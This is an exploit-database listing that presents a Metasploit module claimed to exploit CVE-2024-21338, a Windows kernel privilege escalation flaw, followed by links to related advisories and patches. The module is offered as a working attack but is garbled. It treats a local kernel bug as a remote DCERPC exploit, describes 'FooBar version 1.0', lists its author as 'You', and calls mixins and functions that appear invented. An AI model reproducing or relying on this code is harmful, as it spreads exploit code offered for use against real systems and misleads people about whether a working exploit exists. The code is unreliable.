Lucene search
E1.CodersPACKETSTORM:177869HistoryApr 02, 2024 - 12:00 a.m.
Microsoft Windows 10.0.17763.5458 Privilege Escalation
2024-04-0200:00:00
E1.Coders
packetstormsecurity.com
95
microsoft windows
kernel exposed ioctl
privilege escalation
cve-2024-21338
metasploit
exploit
remote code execution
impacket
nist
`#############################################
# Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 #
#
# This module requires Metasploit: https://metasploit.com/download
#
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Security Risk : High #
# #
# #
#############################################
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact
def initialize(info = {})
super(
update_info(
info,
'Name' => 'CVE-2024-21338 Exploit',
'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
'Author' => 'You',
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-21338']
]
)
)
register_options(
[
OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
OptPort.new('RPORT', [true, 'The target port', 1234])
]
)
end
def check
connect
begin
impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
rescue Rex::Post::Meterpreter::RequestError
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Appears
end
def exploit
connect
begin
impacket_artifact(
dcerpc_binding('ncacn_ip_tcp'),
'FooBar',
datastore['FooBarPayload']
)
rescue Rex::Post::Meterpreter::RequestError
fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
end
handler
disconnect
end
end
#refrence : https://nvd.nist.gov/vuln/detail/CVE-2024-21338
`
Related
thn
thn
Lazarus Hackers Exploited Windows Kernel Flaw as Zero-Day in Recent Attacks
2024-02-29 11:19:00
North Korea's Lazarus Group Deploys New Kaolin RAT via Fake Job Lures
2024-04-25 16:47:00
nvd
nvd
CVE-2024-21338
2024-02-13 18:15:49
vulnrichment
vulnrichment
CVE-2024-21338 Windows Kernel Elevation of Privilege Vulnerability
2024-02-13 18:02:09
cvelist
cvelist
CVE-2024-21338 Windows Kernel Elevation of Privilege Vulnerability
2024-02-13 18:02:09
cisa_kev
cisa_kev
zdt
zdt
Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation Exploit
2024-04-02 00:00:00
attackerkb
attackerkb
CVE-2024-21338
2024-02-13 00:00:00
cve
cve
CVE-2024-21338
2024-02-13 18:15:49
mscve
mscve
Windows Kernel Elevation of Privilege Vulnerability
2024-02-13 08:00:00
prion
prion
Privilege escalation
2024-02-13 18:15:00
githubexploit
githubexploit
Exploit for Untrusted Pointer Dereference in Microsoft
2024-04-17 10:16:21
Exploit for Untrusted Pointer Dereference in Microsoft
2024-04-13 05:53:02
Exploit for Untrusted Pointer Dereference in Microsoft
2024-06-23 06:03:44
exploitdb
exploitdb
Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
2024-04-02 00:00:00
qualysblog
qualysblog
Microsoft and Adobe Patch Tuesday, February 2024 Security Update Review
2024-02-13 20:03:29
avleonov
avleonov
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB5034763)
2024-02-14 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB5034766)
2024-02-14 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB5034768)
2024-02-14 00:00:00
mskb
mskb
February 13, 2024âKB5034763 (OS Builds 19044.4046 and 19045.4046)
2024-02-13 08:00:00
February 13, 2024âKB5034768 (OS Build 17763.5458)
2024-02-13 08:00:00
February 13, 2024âKB5034766 (OS Build 22000.2777)
2024-02-13 08:00:00
nessus
nessus
kaspersky
kaspersky
KLA63958 Multiple vulnerabilities in Microsoft Windows
2024-02-13 00:00:00
rapid7blog
rapid7blog
Patch Tuesday - February 2024
2024-02-13 21:26:21